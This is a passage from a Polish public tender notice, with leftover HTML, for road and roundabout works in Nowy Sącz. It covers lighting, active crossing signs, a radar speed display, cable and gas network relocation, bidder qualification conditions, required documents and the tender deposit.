KunegndyZ istn. słupa linii napowietrznej nN zlokalizowanego przy istn. przejściu dla pieszych na ul. św.Kunegundy w km 18+06,57 ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110 do proj. inteligentnego znaku D-6. Kabel podłączyć do wydzielonego oświetlenia ulicznego na słupie nN wł. Tauron.Przejście dla pieszych w km 18+59,54 ul. św KunegundyZ istn. słupa linii napowietrznej nN zlokalizowanego przy istn. przejściu dla pieszych na ul. św.Kunegundy w km 18+59,54 ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110 do proj. inteligentnego znaku D-6. Kabel podłączyć do wydzielonego oświetlenia ulicznego na słupie nN wł. Tauron.Przejście dla pieszych w km 21+11,20 ul. św KunegundyZ istn. słupa linii napowietrznej nN zlokalizowanego przy istn. przejściu dla pieszych na ul. św.Kunegundy w km 21+11,20 ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110 do proj. inteligentnego znaku D-6. Kabel podłączyć do wydzielonego oświetlenia ulicznego na słupie nN wł. Tauron.Oświetlenie uliczne zaprojektowano montując:-oprawę:-źródło światła oprawy: LED,-moc LED 72W,-IP 66 dla części optycznej i układu zasilającego-stopień ochrony oprawy: IK 08,-barwa światła 5000 K,-rozsył DW,-Przewidywany czas eksploatacji: L90F10 - 50 000h, L80F20 - 100 000h-CRI: >70 dla 5000K, 4000K; >80 dla 3500K, 2700K,-Współczynnik mocy: >=0.95,-słupy aluminiowe: h= 7,7m (zalecany słup SAL-DS84), h=10m + wys. 3-ramienny (rondo),gr. ścianki min. 4 mm,-kolor inox,-fundamenty B-60, B-70,-kabel zasilający YAKXS 4x35 mm2-rury ochronne - DVR110,-przewody w słupach YDY 3x2,5 mm2,-złącza słupowe z wkładkami Bi-Wts 6A,-uziom poziomy - taśma Fe/Zn 30x4.-słup do wysokości 50 cm n.p.t. pokryć elastomerem,-słup do wysokości 200 cm n.p.t. pokryć farbą antyplakat.Oświetlenie przejść dla pieszych oprawami dedykowanymi zaprojektowano montując:-oprawę:-źródło światła oprawy: LED,-moc LED 36W,-IP 66 stopieni ochrony oprawy: IK 08,-barwa światła 3500 K,-rozsył asymetryczny prawostronny,-Przewidywany czas eksploatacji: L90F10 - 50 000h, L80F20 - 100 000h,-CRI: >70 dla 5000K, 4000K; >80 dla 3500K, 2700K,-Współczynnik mocy: >=0.95,-słupy aluminiowe: h= 5m, gr. ścianki min. 4 mm,-wysięgniki jednoramienne: l=1,0m oraz l=1,5m-kolor inox,-fundamenty B-50,-kabel zasilający YAKXS 4x35 mm2,-rury ochronne - DVR110,-przewody w słupach YDY 3x2,5 mm2,-złącza słupowe z wkładkami Bi-Wts 6A,-uziom poziomy - taśma Fe/Zn 30x4.-słup do wysokości 50 cm n.p.t. pokryć elastomerem,-słup do wysokości 200 cm n.p.t. pokryć farbą antyplakat.Oświetlenie przejść dla pieszych inteligentnym podświetleniem znaku D-6 zaprojektowano montując:-słup:-wysokość: 6m, ramie na wysokości 5,5m dł., ramienia: do 6m-prześwit pod znakiem 5,5m, stal ocynkowana ogniowo-przystosowany dla I strefy wiatrowej, certyfikowany, słup stożkowy,-skrzynka sterownicza na wysięgniku przygotowana do zasilania z sieci + zestaw buforowyoprawę LED:-źródło światła oprawy: LED,-moc oprawy 50W,-strumień świetlny oprawy min. 10499 lm,-barwa światła 2500-3300 K-Oprawa umieszczona pod znakiem aktywnym D6 (polonem) - wysokiej wydajności świetlnej podświetlenie przejścia dla pieszych o mocno ukierunkowanym źródle światła (oświetlony są dokładnie pasy, natomiast nie ma rozproszenia światła na boki mogące oślepiać kierowców);-aktywny znak D6 (pylon LED):-dwustronny pylon D6 o wymiarach ok. 900x900mm podświetlany od środka LED;-dwustronny pulsator LED o średnicy ok. 300mm nad pylonem; pulsator mruga 24h / dobę.-fundamenty kompletny prefabrykowany,-skrzynka sterownicza na wysięgniku przygotowana do zasilania z sieci 230V,-zestaw buforowy:-Zestaw buforowy, akumulator żelowy głębokiego rozładowania o pojemności min. 36Ah,podtrzymuje pulsator LED w ciągu dnia. W nocy doładowywany z sieci 230V,-kabel zasilający YAKXS 4x35 mm2,-uziom poziomy - taśma Fe/Zn 30x4.-słup do wysokości 50 cm n.p.t. pokryć elastomerem,-słup do wysokości 200 cm n.p.t. pokryć farbą antyplakat.Należy dobrać urządzenia o parametrach równoważnych lub lepszych od podanych spełniające wymagania MZD w Nowym Sączu oraz aktualne normy.Obszar przejść dla pieszych należy wyróżnić odmienną barwą światła względem oświetlenia ciągu drogi. Barwę światła dobrać w porozumieniu z Inwestorem (konserwatorem oświetlenia). Kable w miejscu skrzyżowań z infrastrukturą techniczną oraz pod drogami zabezpieczyć dodatkowo rurami ochronnymi DVK160 lub SRS160 - zgodnie z PZT. Kable w chodniku i na poboczu należy układać na głębokości min. 70 cm, a pod drogą min. 120cm na warstwie piasku o grubości co najmniej 10 cm, linią falistą z zapasem wystarczającym do skompensowania ewentualnych przesunięć gruntu tj. od 1 do 3 % długości wykopu. Ułożony kabel należy zasypać warstwą piasku o grubości co najmniej 10cm, warstwą rodzimego gruntu o grubości 15cm, a następnie przykryć folią koloru niebieskiego. Odległość folii od kabla powinna wynosić co najmniej 25 cm. Na całej długości kabla w odległości nie większej niż 10 m oraz w miejscach charakterystycznych tj. przy wejściach do rur, załamaniach itp. należy zaopatrzyć go w trwałe oznaczniki identyfikacyjne wykonane z blachy ołowianej lub z tworzywa sztucznego.Sterowanie oświetleniemSterowanie oświetleniem odbywać się będzie jak dla stanu istniejącego - zegarem astronomicznym w SOU - istn. szafka oświetlenia ulicznego.Wybór klas oświetleniaObliczeń fotoelektrycznych z doborem opraw dokonano przy pomocy programu DIALUX. Projektowane oświetlenie spełnia wymagania normy. Lokalizację słupów oraz trasę linii pokazano na planach sytuacyjnych.Radarowy wyświetlacz prędkościNależy wykonać wcinkę w istn. kabel oświetleniowy YAKXS 4x35mm2 zlokalizowany przy proj.radarowym wyświetlaczu prędkości w km 16+13,00 ul. św. Kunegundy i dwustronnie z jednym mufowaniem wprowadzić do wyświetlacza.Solarny znak aktywny RADAR (pylon) wymagania:-aktywny RADAR (pylon)-radar z modułem komunikacji bezprzewodowej i modułem do tworzenia statystyk,-zastosowanie źródeł światła o wysokiej sprawności,-pomiar prędkości nadjeżdżającego samochodu i wyświetlanie go na dużym czytelnym wyświetlaczu z dokładnością do 1 km/h,solarny zestaw zasilający-panel fotowoltaiczny monokrystaliczny: 90W 12V,-akumulator żelowy głębokiego rozładowania, bezobsługowy: 36Ah 12V,-regulator solarny,-skrzynia hermetyczna na elektronikę + akumulator,-zestaw buforowy-Zestaw buforowy, akumulator żelowy głębokiego rozładowania o pojemności min. 36Ah,podtrzymuje pulsator LED w ciągu dnia. W nocy doładowywany z sieci 230V-skrzynka baterii-Skrzynka sterownicza na słupie przygotowana do zasilania z sieci 230V-słup-wysokość: 5m o średnicy ?114mm, stal ocynkowana ogniowo***, uchwyt na radar-przystosowany dla I strefy wiatrowej wg PN-EN 1991-1-4,-kabel zasilający YAKXS 4x35 mm2,-fundamenty kompletny prefabrykowany,-uziom poziomy - taśma Fe/Zn 30x4.-słup do wysokości 50 cm n.p.t. pokryć elastomerem,-słup do wysokości 200 cm n.p.t. pokryć farbą antyplakat.Należy dobrać urządzenia o parametrach równoważnych lub lepszych od podanych spełniające wymagania MZD w Nowym Sączu oraz aktualne normy. Przed montażem dobór urządzeń uzgodnić z inwestorem. Kable w chodniku i na poboczu należy układać na głębokości min. 70 cm, na warstwie piasku o grubości co najmniej 10 cm, linią falistą z zapasem wystarczającym do skompensowania ewentualnych przesunięć gruntu tj. od 1 do 3 % długości wykopu. Ułożony kabel należy zasypać warstwą piasku o grubości co najmniej 10cm, warstwą rodzimego gruntu o grubości 15cm, a następnie przykryć folią koloru niebieskiego. Odległość folii od kabla powinna wynosić co najmniej 25 cm. Na całej długości kabla w odległości nie większej niż 10 m oraz w miejscach charakterystycznych tj. przy wejściach do rur, załamaniach itp. należy zaopatrzyć go w trwałe oznaczniki identyfikacyjne wykonane z blachy ołowianej lub z tworzywa sztucznego.Przebudowy i zabezpieczenie istn. sieci nN i SNW związku z proj. budową ronda na skrzyżowaniu ulic Grodzka, św. Kunegundy i Jagiellońskiej należy przebudować inst. kable nN poza obszar kolizji.Zgodnie z danymi TAURON DYSTRYBUCJA S.A w pobliżu ronda znajdują się 2 kable nN AKYY4x(1x120) mm2 wymagające przebudowy oraz kabel YAKY 4x240mm2. Zgodnie z załączoną mapą należy przebudować w/w kable poza obszar kolizji. Wykonać mufy kablowe przelotowe i przejściowe pomiędzy istn. kablami, a proj. kablami NA2XY-J 4x120 mm2 i NA2XYJ 4x240 mm2. Pozostałe kable zasilające istn. sygnalizację świetlną zgodnie z załączoną mapą do umartwienia (demontażu).Wzdłuż przebudowywanych ulic przebiegają istn. kable SN i nN które należy zabezpieczyć rurami ochronnymi rurami APS110 i APS160.Kable w miejscu skrzyżowań z infrastrukturą techniczną oraz pod drogami zabezpieczyć rurami ochronnymi DVK160 lub SRS160 - zgodnie z PZT. Kable w chodniku i na poboczu należy układać na głębokości min. 70 cm, a pod drogą min. 120cm na warstwie piasku o grubości co najmniej 10 cm, linią falistą z zapasem wystarczającym do skompensowania ewentualnych przesunięć gruntu tj. od 1 do 3 % długości wykopu. Ułożony kabel należy zasypać warstwą piasku o grubości co najmniej 10cm, warstwą rodzimego gruntu o grubości 15cm, a następnie przykryć folią koloru niebieskiego. Odległość folii od kabla powinna wynosić co najmniej 25 cm. Na całej długości kabla w odległości nie większej niż 10 m oraz w miejscach charakterystycznych tj. przy wejściach do rur, załamaniach itp. należy zaopatrzyć go w trwałe oznaczniki identyfikacyjne wykonane z blachy ołowianej lub z tworzywa sztucznego.Demontaż istniejącego oświetleniaNależy zdemontować istniejące słupy oświetleniowe, sygnalizacji świetlnej oraz kable na proj.rondzie.przebudowa/przełożenie/zabezpieczenie sieci gazowej:Projektowany zakres rzeczowy jest następujący (ul.Grodzka)-rura polietylenowa (przewodowa) PE 100RC SDR17 typ 2 dn160 - zgodnie z PN-EN 1555-2 oraz PAS 1075, -rura polietylenowa (przewodowa) PE 100RC SDR 11 typ 2 dn63 - zgodnie z PN-EN 1555-2 oraz PAS 1075, -rura polietylenowa (osłonowa) PE100 RC SDR17 typ 2 dn225 - zgodnie z PN-EN 1555-2 oraz PAS 1075, -połączenie PE-Stal dn160/DN150 (materiał części polietylenowej - PE100 RC SDR17 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -połączenie PE-Stal dn110/DN100 (materiał części polietylenowej - PE100 RC SDR17 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -połączenie PE-Stal dn63/DN50 materiał części polietylenowej - PE100 RC SDR11 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -połączenie PE-Stal dn50/DN40 (materiał części polietylenowej - PE100 RC SDR11 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -zespół zaporowo-upustowy DN150 z króćcami dn160PE (2 szt. kurka upustowego DN50). Projektowany zakres rzeczowy jest następujący (ul.Kunegundy):-rura polietylenowa (przewodowa) PE 100RC SDR17 typ 2 dn160 - zgodnie z PN-EN 1555-2 oraz PAS 1075, -rura polietylenowa (osłonowa) PE100 RC SDR17 typ 2 dn225 - zgodnie z PN-EN 1555-2 oraz PAS 1075, -połączenie PE-Stal dn160/DN150 (materiał części polietylenowej - PE100 RC SDR17 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -połączenie PE-Stal dn110/DN100 (materiał części polietylenowej - PE100 RC SDR17 typ 2, materiał części stalowej - P265) - połączenie wg ST-IGG-1101:2017, -zespół zaporowo-upustowy DN150 z króćcami dn160PE (2 szt. kurka upustowego DN50). Szczegółowy zakres robót określają:o	rysunki, szkice i przekroje konstrukcyjne stanowiące integralną część siwzo	przedmiar robót stanowiący dokumentację pomocniczą do wyceny zamówienia,o	STWiORB stanowiące integralną część siwzo	dokumentacja projektowa: budowy sieci kanalizacji deszczowej, przebudowy/przełożenia/zabezpieczenia sieci energetycznej i oświetlenia ulicznego, przebudowy/przełożenia/zabezpieczenia sieci gazowej- stanowiące załącznik nr 15 do siwz.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233140-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231400-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45315300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231220-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy PZP, polegającego na powtórzeniu podobnych robót budowlanych. Całkowita wartość tego zamówienia wynosi nie więcej niż 1 500 000,00 zł.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-06-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Określenie warunków: posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumęgwarancyjną nie mniejszą niż 2 000 000,00 zł na jedno i wszystkie zdarzenia i zdolność kredytową na sumę nie mniejszą niż 2 000 000,00 zł</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1.posiada doświadczenie, polegające na wykonaniu w sposób należyty oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył conajmniej 2 -wie roboty budowlane o podobnym charakterze do robót stanowiących przedmiot zamówienia . Należy przez to rozumieć roboty polegające nabudowie/przebudowie/rozbudowie/remoncie ulicy/drogi publicznej w technologii porównywalnej o długości co najmniej 500mb każde zamówienie. Za technologięporównywalną Zamawiający uzna minimum ułożenie nawierzchni drogi/ulicy z betonu asfaltowego oraz wykonanie podbudowy z kruszywa. 2.przy realizacji zamówieniabędzie dysponował osobami zdolnymi do wykonania zamówienia, tj.: okierownikiem budowy w specjalności drogowej bez ograniczeń ,okierownikiem robót w specjalności elektroenergetycznej bez ograniczeń,okierownikiem robót w specjalności gazowej bez ograniczeń - osoby posiadające uprawnienia budowlane uprawniające do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2016 poz. 290 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278). Zamawiający dopuszcza kwalifikacje równoważne do w/w, zdobyte w innych państwach na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. 2019 poz. 1186 z p.zm.).3.przy realizacji zamówienia będzie dysponował niezbędnymi do wykonaniazamówienia narzędziami, wyposażeniem zakładu i urządzeniami: -Wytwórnia Mas Bitumicznych o wydajności min. 100Mg/h lub zapewnienie dostawy betonu asfaltowegoz wytwórni położonej w uzasadnionej technologicznie odległości - należy podać lokalizację WMB -frezarka do nawierzchni o szer.min.1 m- min.1 sztuka -spycharkagąsienicowa- min.1 sztuka -koparka gąsienicowa- min.1 sztuka -równiarka samojezdna- min.1 sztuka -walec samojezdny-min.4 sztuki -rozkładarka mas bitumicznychsterowana elektronicznie, umożliwiająca rozkładanie mieszanki mineralno-bitumicznej całą szerokością jezdni-min. 2 sztuki -samochód samowyładowczy dostosowany doprzewozu mieszanki mineralno-bitumicznej w każdych warunkach atmosferycznych-min.10 sztuk.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na ratyzaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawcazawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidzianeprawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) odpisu z właściwegorejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia brakupodstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy; 4) oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazuubiegania się o zamówienie publiczne, zgodnie ze wzorem stanowiącym załącznik nr 5; 5) oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyrokusądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym w rozdziale VI ust. 4 i 5 SIWZ, zgodnie ze wzorem stanowiącymzałącznik nr 6; 6) oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawapracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym, w zakresie określonym w rozdziale VI ust. 6 SIWZ, zgodnie ze wzorem stanowiącymzałącznik nr 7; 7) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991r. o podatkach iopłatach lokalnych (Dz. U. z 2018r., poz. 1445 z późn. zm.), zgodnie ze wzorem stanowiącym załącznik nr 8; 8) oświadczenia wykonawcy o przynależności lub brakuprzynależności do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 9; w przypadku przynależności do tej samej grupy kapitałowej wykonawcamoże złożyć wraz z oświadczeniem dokumenty bądź inne informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.w zakresie sytuacji ekonomicznej lub finansowej: 1.2.a) dokument potwierdzający, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresieprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000 000,00 zł na 1 i wszystkie zdarzenia i zdolność kredytową na sumę nie mniejszą niż 2000000 zł; 2) w zakresie zdolności technicznej lub zawodowej:1.3.a) wykaz robót budowlanych zgodnych z warunkiem udziału w postępowaniu, wykonanych nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert, ajeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie ze wzorem stanowiącym załącznik nr 2, z załączeniem dowodów określających, czy te robotybudowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowoukończone. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli zuzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; 1.3.b) wykaz osób, którymi wykonawcabędzie dysponował przy realizacji zamówienia, zgodnie ze wzorem stanowiącym załącznik nr 3. 1.3.c) wykaz narzędzi , wyposażenia zakładu i urządzeń technicznychzgodnie ze wzorem stanowiącym załącznik nr 3a.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Przystępując do przedmiotowego postępowania wykonawca zobowiązany jest do wniesienia wadium w wysokości 50 000,00 zł. 2. Wadium może zostać wniesione wjednej lub kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczeniekasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowaw art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości (t. j. Dz. U z 2019r. poz. 310). 3. Wadium należ wnieść przedupływem terminu składania ofert.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div 